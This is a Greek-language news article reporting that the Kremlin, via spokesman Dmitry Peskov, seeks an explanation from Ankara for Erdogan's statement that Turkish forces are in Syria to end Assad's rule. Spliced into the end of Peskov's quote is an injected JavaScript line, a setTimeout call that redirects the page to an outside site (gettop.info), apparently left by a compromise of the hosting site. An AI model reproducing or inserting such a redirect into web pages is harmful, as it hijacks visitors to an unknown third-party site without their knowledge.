Το Κρεμλίνο ζητεί εξηγήσεις από την Άγκυρα για τον Άσαντ

0
3

 

Εξηγήσεις για τις δηλώσεις του Τούρκου Προέδρου Ταγίπ Ερντογάν σχετικά με τη Συρία ότι οι δυνάμεις της Ρωσίας στη Συρία βρίσκονται εκεί για να ανατρέψουν τον Μπασάρ αλ-Άσαντ ζητεί το Κρεμλίνο που εξέφρασε την έκπληξη της για τη συγκεκριμένη δήλωση.

Σε ομιλία του ο Ερντογάν καταδίκασε αυτό που αποκάλεσε αποτυχία του ΟΗΕ στη Συρία και εμφάνισε ως πράξη απόγνωσης την εισβολή της Τουρκίας τον Αύγουστο, όταν έστειλε άρματα μάχης, μαχητικά αεριωθούμενα και ειδικές δυνάμεις στο συριακό έδαφος.

«Είμαστε εκεί για να φέρουμε δικαιοσύνη. Είμαστε εκεί για να τερματίσουμε την κυριαρχία του απάνθρωπου Άσαντ, ο οποίος ασκεί κρατική τρομοκρατία», δήλωσε ο Ερντογάν και σχολιάστηκε έντονα από τον εκπρόσωπο του Κρεμλίνου Ντμίτρι Πεσκόφ: «Η ανακοίνωση αυτή ήταν πραγματικά κάτι καινούριο για εμάς».

«Είναι μια πολύ σοβαρή δήλωση και διαφέρει από προηγούμενες και από την αντίληψή μας για την κατάσταση. Ελπίζουμε πως οι Τούρκοι εταίροι μας θα μας παράσχουν κάποιου είδους εξήγηση γι’ αυτό», σχολίασε ο Πεσκόφ. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here